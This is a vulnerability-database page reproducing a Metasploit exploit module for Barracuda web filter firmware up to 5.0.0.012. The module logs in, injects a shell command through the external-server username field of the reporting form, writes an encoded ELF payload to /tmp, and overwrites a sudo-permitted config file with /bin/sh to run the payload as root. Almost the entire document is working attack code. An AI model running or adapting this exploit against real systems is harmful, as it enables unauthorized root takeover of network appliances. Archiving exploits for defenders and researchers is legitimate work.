Vulners
Lucene search
Barracuda Firmware <= 5.0.0.012 reporting Post Auth Remote Root Exploit
# Exploit Title: Barracuda Firmware <= 5.0.0.012 Post Auth Remote Root exploit
# Exploit Author: xort
# Vendor Homepage: https://www.barracuda.com/
# Software Link: https://www.barracuda.com/products/webfilter
# Version: Firmware <= 5.0.0.012
# Tested on: Vx and Hardware platforms
#
# Postauth remote root in Barracuda Firmware <= 5.0.0.012 for any under priviledged user with report generating
# capablities. This exploit leverages a command injection bug along with poor sudo permissions to obtain
# root. [email protected]
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Exploit::Remote::Tcp
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Barracuda Firmware <= 5.0.0.012 reporting Post Auth Remote Root',
'Description' => %q{
This module exploits a remote command execution vulnerability in
the Barracuda Firmware Version <= 5.0.0.012 by exploiting a
vulnerability in the web administration interface.
By sending a specially crafted request it's possible to inject system
commands while escalating to root do to relaxed sudo configuration on the local
machine.
},
'Author' =>
[
'xort', # metasploit module
],
'Version' => '$Revision: 12345 $',
'References' =>
[
[ 'none', 'none'],
],
'Platform' => [ 'linux'],
'Privileged' => true,
'Arch' => [ ARCH_X86 ],
'SessionTypes' => [ 'shell' ],
'Privileged' => false,
'Payload' =>
{ # note: meterpreter can't run on host do to kernel 2.4 incompatabilities + this is stable
'Compat' =>
{
'ConnectionType' => 'find',
}
},
'Targets' =>
[
['Linux Universal',
{
'Arch' => ARCH_X86,
'Platform' => 'linux'
}
],
],
'DefaultTarget' => 0))
register_options(
[
OptString.new('PASSWORD', [ false, 'Device password', "" ]),
OptString.new('ET', [ false, 'Device password', "" ]),
OptString.new('USERNAME', [ true, 'Device password', "admin" ]),
OptString.new('CMD', [ false, 'Command to execute', "" ]),
Opt::RPORT(8000),
], self.class)
end
def do_login(username, password, et)
vprint_status( "Logging into machine with credentials...\n" )
# timeout
timeout = 1550;
# params
password_clear = "admin"
real_user = "";
login_state = "out"
enc_key = Rex::Text.rand_text_hex(32)
et = "1358817515"
locale = "en_US"
user = username
password = Digest::MD5.hexdigest(username+enc_key)
enctype = "MD5"
password_entry = ""
vprint_status( "Starting first routine...\n" )
data = "real_user=#{real_user}&login_state=#{login_state}&enc_key=#{enc_key}&et=#{et}&locale=#{locale}&user=#{user}&password=#{password}&enctype=#{enctype}&password_entry=#{password_entry}&password_clear=#{password_clear}&Submit=Login"
vprint_status( "#{data}\n" )
res = send_request_cgi(
{
'method' => 'POST',
'uri' => "/cgi-mod/index.cgi",
'cookie' => "",
'data' => data
}, timeout)
vprint_status( "login got code: #{res.code} ... continuing to second request..." )
File.open("/tmp/output2", 'w+') {|f| f.write(res.body) }
# get rid of first yank
password = res.body.split('\n').grep(/(.*)id=\"password\" value=\"(.*)\"/){$2}[0] #change to match below for more exact result
et = res.body.split('\n').grep(/(.*)id=\"et\" value=\"([^\"]+)\"/){$2}[0]
vprint_status( "password got back = #{password} - et got back = #{et}\n" )
return password, et
end
def run_command(username, password, et, cmd)
vprint_status( "Running Command...\n" )
exploitreq = [
[ "primary_tab", "BASIC" ],
[ "secondary_tab","reports" ],
[ "realm","" ],
[ "auth_type","Local" ],
[ "user", username ],
[ "password", password ],
[ "et",et ],
[ "role","" ],
[ "locale","en_US" ],
[ "q","" ],
[ "UPDATE_new_report_time_frame","custom" ],
[ "report_start","2013-01-25 01:14" ],
[ "report_end","2013-01-25 02:14" ],
[ "type","" ],
[ "ntlm_server","" ],
[ "kerb_server","" ],
[ "local_group","changeme" ],
[ "ip_group","20.20.108.0/0.0.0.0" ],
[ "ip_address__0","" ],
[ "ip_address__1","" ],
[ "ip_address__2","" ],
[ "ip_address__3","" ],
[ "netmask__0","" ],
[ "netmask__1","" ],
[ "netmask__2","" ],
[ "netmask__3","" ],
[ "UPDATE_new_report_pattern_values","" ],
[ "UPDATE_new_report_pattern_text","" ],
[ "UPDATE_new_report_filter_destination","domain" ],
[ "filter_domain","" ],
[ "UPDATE_new_report_filter_domain","" ],
[ "UPDATE_new_report_filter_category","" ],
[ "UPDATE_new_report_exclude_from","" ],
[ "UPDATE_new_report_exclude_to","" ],
[ "UPDATE_new_report_exclude_days","" ],
[ "allow","allow" ],
[ "block","block" ],
[ "warn","warn" ],
[ "monitor","monitor" ],
[ "UPDATE_new_report_filter_actions","allow,block,warn,monitor" ],
[ "UPDATE_new_report_filter_count","10" ],
[ "UPDATE_new_report_chart_type","vbar" ],
[ "UPDATE_new_report_format","html" ],
[ "DEFAULT_new_report_group_expand","No" ],
[ "UPDATE_new_report_expand_user_count","5" ],
[ "UPDATE_new_report_expand_domain_count","5" ],
[ "UPDATE_new_report_expand_cat_count","5" ],
[ "UPDATE_new_report_expand_url_count","5" ],
[ "UPDATE_new_report_expand_threat_count","5" ],
[ "report","on" ],
[ "UPDATE_new_report_name", Rex::Text.rand_text_alphanumeric(10) ],
[ "UPDATE_new_report_id","" ],
[ "UPDATE_new_report_enabled","Yes" ],
[ "secondary_scope","report" ],
[ "secondary_scope_data","" ],
[ "UPDATE_new_report_reports","sessions_by_user,infection_activity" ],
[ "UPDATE_new_report_delivery","external" ],
[ "UPDATE_new_report_delivery_dest_email","" ],
[ "UPDATE_new_report_server","new" ],
[ "UPDATE_new_external_server_type","smb" ],
[ "UPDATE_new_external_server_alias", Rex::Text.rand_text_alphanumeric(10) ],
[ "UPDATE_new_external_server","4.4.4.4" ],
[ "UPDATE_new_external_server_port","445" ],
[ "UPDATE_new_external_server_username","\"` #{cmd} `\"" ],
[ "UPDATE_new_external_server_password","asdf" ],
[ "UPDATE_new_external_server_path","/"+ Rex::Text.rand_text_alphanumeric(15) ],
[ "UPDATE_new_report_frequency", "once" ],
[ "UPDATE_new_report_split", "no" ],
[ "add_report_id","Apply" ],
[ "remover","" ]
]
data = Rex::MIME::Message.new
data.bound = "---------------------------" + Rex::Text.rand_text_numeric(30)
exploitreq.each do |xreq|
data.add_part(xreq[1], nil, nil, "form-data; name=\"" + xreq[0] + "\"")
end
post_data = data.to_s
post_data = post_data.gsub(/\r\n---------------------------/, "---------------------------")
datastore['UserAgent'] = "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0"
vprint_status( "sending..." )
res = send_request_cgi({
'method' => 'POST',
'uri' => "/cgi-mod/index.cgi",
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => post_data,
'headers' =>
{
'Accept' => "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
'Accept-Language' => "en-US,en;q=0.5"
}
})
if res.code == 200
vprint_status( "You can now reuse the login params you were supplied to avoid the lengthy wait at the exploits initial launch.... \n" )
vprint_status( "password: #{password} et: #{et}\n" )
end
vprint_status( "login got code: #{res.code} from report_results.cgi\n" )
File.open("/tmp/output4", 'w+') {|f| f.write(res.body) }
end
def run_script(username, password, et, cmds)
vprint_status( "running script...\n")
end
def exploit
# timeout
timeout = 1550;
user = "admin"
# params
real_user = "";
login_state = "out"
et = "1358817515" #epoch time
locale = "en_US"
user = "admin"
password = ""
enctype = "MD5"
password_entry = ""
password_clear = "admin"
vprint_status("<- Encoding payload to elf string...")
elf = Msf::Util::EXE.to_linux_x86_elf(framework, payload.raw)
encoded_elf = elf.unpack("H*").join().gsub(/(\w)(\w)/,'\\\\\\\\\\x\1\2') # extra escaping to get passed down correctly
if not datastore['PASSWORD'].nil? and not datastore['PASSWORD'].empty?
password_clear = "admin"
password = datastore['PASSWORD']
et = datastore['ET']
# else - if no 'CMD' string - add code for root shell
else
password, et = do_login(user, password, et)
vprint_status("new password: #{password}\n")
end
sleep(5)
if not datastore['CMD'].nil? and not datastore['CMD'].empty?
cmd = datastore['CMD']
end
run_command(user, password, et, cmd)
# create elf in /tmp, abuse sudo to overwrite another command we have sudo access to (tar), then execute with sudo perm
cmd = "echo -ne #{encoded_elf} > /tmp/x ;"
cmd += "chmod +x /tmp/x ;"
# backup static_routes file
cmd += "cp -f /home/product/code/config/static_routes /tmp/zzz"
cmd += "sudo cp -f /bin/sh /home/product/code/config/static_routes"
# execute elf as root
cmd += "sudo /home/product/code/config/static_routes -c /tmp/x ;"
# restore static_routes file
cmd += "cp -f /tmp/zzz /home/product/code/config/static_routes"
run_command(user, password, et, cmd)
sleep(2)
handler
sleep(5)
end
end
# 0day.today [2018-01-01] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
09 Apr 2015 00:00Current
7.1High risk
Vulners AI Score7.1